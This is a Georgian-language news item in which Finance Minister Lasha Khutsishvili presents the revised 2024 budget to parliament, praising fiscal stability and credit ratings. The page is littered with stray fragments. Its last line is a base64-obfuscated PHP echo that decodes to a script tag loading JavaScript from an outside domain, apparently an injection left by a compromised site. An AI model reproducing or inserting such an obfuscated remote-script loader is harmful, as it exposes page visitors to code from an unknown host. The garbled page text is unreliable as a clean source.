celsiusi
ავერსი საქკაბელი

პანდემიისა და პოსტპანდემიურ პერიოდში გატარებული სწორი და ჯანსაღი მაკროეკონომიკური და ფისკალური პოლიტიკის შედეგად, ქვეყანამ ერთი მხრივ შეძლო სწრაფი ეკონომიკური აღდგენის უზრუნველყოფა, ხოლო მეორე მხრივ, ამ პერიოდში შეინარჩუნა მაკროეკონომიკური სტაბილურობა და საკრედიტო რეიტინგები - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა პარლამენტში 2024 წლის ბიუჯეტის პროექტის გადამუშავებული ვერსიის წარდგენისას.

მისი თქმით, 2023 წლისთვის სარეიტინგო კომპანია Fitch-ის მიხედვით, საქართველომ ისტორიულად საუკეთესო BB პოზიტიური რეიტინგი დააფიქსირა.

„ჩვენი ეკონომიკისა და ჩვენი საკრედიტო რეიტინგების ერთ-ერთი ყველაზე ძლიერი მხარე ფისკალური სექტორია, რაც აღიარებულია საერთაშორისო შეფასებებისა და რეიტინგების მიერ. საქართველო არის მსოფლიოში პირველ ადგილზე ბიუჯეტის ღიაობის მიხედვით, რაც მოიცავს ბიუჯეტის გამჭვირვალობის, ანგარიშვალდებულებისა და ზედამხედველობის სტანდარტების შეფასებას. ჩვენ გვაქვს მსოფლიოში ერთ-ერთი ყველაზე ჯანსაღი და ეკონომიკურ ზრდაზე ორიენტირებული საგადასახადო სისტემა, რაც საერთაშორისო ორგანიზაციების მიერ აღიარებულია, როგორც კარგი მაგალითი მსოფლიოსათვის; მსოფლიო ბანკის შეფასებით, საქართველოს აქვს ერთ-ერთი ყველზე მოწინავე ბიზნესგარემო და დაბალი გადასახადები, მაგრამ ამავე დროს, გვაქვს ძალიან ეფექტური საგადასახადო ადმინისტრირება, რაც საშუალებას გვაძლევს, ყოველ წელს მნიშვნელოვნად გაზრდილი ბიუჯეტი წარმოგიდგინოთ და ამავდროულად, ფისკალურ კონსოლიდაციას ვახორციელებდეთ“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

307
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");